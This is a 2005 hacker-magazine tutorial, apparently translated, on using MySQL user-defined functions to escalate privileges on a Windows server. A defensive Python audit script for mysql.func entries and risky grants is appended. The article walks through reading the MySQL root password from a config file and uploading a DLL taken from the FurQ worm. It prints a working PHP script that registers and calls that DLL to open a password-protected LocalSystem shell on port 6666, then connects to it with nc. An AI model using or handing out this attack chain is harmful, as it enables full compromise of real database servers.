Author kEvin
Note: The manuscript has been published in the 7th issue of "Hacker Line" in 2005. Please note the copyright and source for reprinting.
Not long ago, a MySQL Func vulnerability was published online, which describes using MySQL to create a custom function and then attacking the server through that function. The first relevant report I saw was on o-otik, but only an exploit for Unix systems was published, and its success rate was not very high. Recently, some experts in China released related articles for Win systems, so I immediately studied them together with my friends.
In fact, we have long known that when we attack an MSSQL\Oracle database, we obtain the highest-privileged accounts in the database and then often execute special extended procedures or functions to attack. For example, MSSQL has Xp_cmdshell, and Oracle can likewise create special functions. But we never thought that MySQL, one of the most popular database systems, can also create functions. From this point of view, this so-called vulnerability in MySQL should not be called a vulnerability but rather a technique.
After all that rambling, let's learn how to create a function in MySQL. This is much more important than how to use it: as long as you understand the principle, you can use it more flexibly and combine it with other ideas.
The statement to create a function in MySQL is:
Create Function FunctionName Returns [String|Integer|Real] Soname 'C:\';
FunctionName is the name of the function, C:\ is the path of the DLL called by the function, and the function name must match the name of an exported function in the DLL. Note, however, that if we need MySQL to pass parameters to the function, then we must follow the UDF programming rules; for details, see Section 14 of the MySQL manual, "Adding a New Function to MySQL". STRING, INTEGER, and REAL specify the type of the value returned after the function is executed. Of course, we do not have to follow the UDF format. In fact, if the code we want to execute inside our function does not use parameters, we can still achieve the attack effect, for example with System(""). The FurQ worm that is currently spreading through this vulnerability on the Internet is an example that does not use the UDF format. But note that this statement to create the function requires that the MySQL account we use has write permission on the mysql database, otherwise it cannot be used normally.
OK. After understanding the principle, let’s take a look at how to use MySQL to increase permissions.
Here we have already obtained a WebShell on the server through some vulnerability. What I am demonstrating here is angel's phpspy, because PHP has functions to connect to MySQL by default, while ASP needs additional components to connect, so it does not meet the requirements.
Generally speaking, under the Win system, many programs write a file into the system directory that contains very sensitive MySQL information. If the compromised host does not have good permission settings and we have browsing permission on the %windir% directory, it can be read very easily. Moreover, many administrators usually write the root account and password into this file, so once we read the root user's password, we can control the entire MySQL database or even the server. As shown in Figure 1.
After getting the MySQL root password, we need to upload our DLL file. I am using the DLL extracted from the FurQ worm. Executing the shell function in it makes the system open a password-protected CMD shell on port 6666. Of course, we already know the password, which is just the four characters "FurQ". However, we cannot execute it directly; we need to register this function in MySQL through MySQL itself.
Now, we use PHPSPY to create a new PHP file and enter the following content:
<?php
$link = mysql_connect('127.0.0.1', 'root', 'root');
if (!$link) {
    die('Could Not Connect The Database!: ' . mysql_error());
}
echo "Good !<br>";
// The root/root here are the user name and password read from the configuration file.
@mysql_select_db('mysql') or die('use database mysql failed!');
echo "Yes You Did!<br>";
// Here we select the mysql database. Of course, you can also choose another one, such as test.
$query = "Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\';";
@$result = mysql_query($query, $link) or die("Create Function Failed!");
echo "Goddess...Succeeded!<br>";
// These two lines are the key: they execute the MySQL CREATE FUNCTION statement, registering the Shell function from the DLL under d:\wwwroot\ in MySQL so that MySQL can execute it.
$query = "Select Shell();";
@$result = mysql_query($query, $link) or die("Execute failed");
echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ<br>";
// This step executes the Shell function, which opens port 6666 on the server.
?>
Run it, and every step returns normally, as shown in Figure 2. Now we can use nc to connect to port 6666 on the server and enter the password FurQ, and we get a CMDSHELL back. Of course, since the shell inherits MySQL's permissions, and MySQL on the Win system is installed by default to run as LocalSystem, the shell we get has LocalSystem permission, and you can do whatever you want, but don't do bad things. Haha.
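As an added example (not part of the original article and not the FurQ worm's code), here is a defender-side audit in Python of the two things the technique above depends on: UDF rows that the CREATE FUNCTION statement records in mysql.func, and an application account holding INSERT on the mysql database. The rows, grant lines, allowlist and the d:\wwwroot\ library path are constructed sample data, not taken from any real server.

```python
import os
import re

# Constructed sample rows, as returned by: SELECT name, dl FROM mysql.func;
FUNC_ROWS = [
    ("metaphon", "udf_example.dll"),           # a UDF the DBA deployed (assumed)
    ("Shell", "d:\\wwwroot\\constructed.dll"),  # constructed: registered with a full path
]

# Constructed sample lines, as returned by: SHOW GRANTS FOR 'web'@'localhost';
GRANT_LINES = [
    "GRANT USAGE ON *.* TO 'web'@'localhost' IDENTIFIED BY PASSWORD '*CONSTRUCTED'",
    "GRANT SELECT, INSERT, UPDATE ON `appdb`.* TO 'web'@'localhost'",
    "GRANT INSERT ON `mysql`.* TO 'web'@'localhost'",
]

# Assumption: the only shared library the DBA ever deployed for UDFs.
ALLOWED_LIBS = {"udf_example.dll"}

# Privileges that allow rows to be written into mysql.func (where CREATE FUNCTION records UDFs).
DANGEROUS_PRIVS = {"ALL PRIVILEGES", "INSERT"}
GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<obj>\S+) TO ", re.IGNORECASE)


def audit_udfs(rows, allowed=ALLOWED_LIBS):
    """Return (name, dl, reason) for each registration that does not match the deployed set."""
    findings = []
    for name, dl in rows:
        # A library given with a directory component was loaded from an arbitrary path.
        if "/" in dl or "\\" in dl or os.path.isabs(dl):
            findings.append((name, dl, "library path contains a directory component"))
        elif dl not in allowed:
            findings.append((name, dl, "library not in the deployed allowlist"))
    return findings


def audit_grants(lines):
    """Return grant lines that let the account insert into the mysql database."""
    findings = []
    for line in lines:
        m = GRANT_RE.match(line)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        obj = m.group("obj").replace("`", "").lower()
        if obj in ("*.*", "mysql.*", "mysql.func") and privs & DANGEROUS_PRIVS:
            findings.append(line)
    return findings


if __name__ == "__main__":
    for finding in audit_udfs(FUNC_ROWS) + audit_grants(GRANT_LINES):
        print("FINDING:", finding)
```

Run against a live server by replacing the two constructed lists with the real query results; any finding means the account or the UDF table should be cleaned up before the web tier is trusted again.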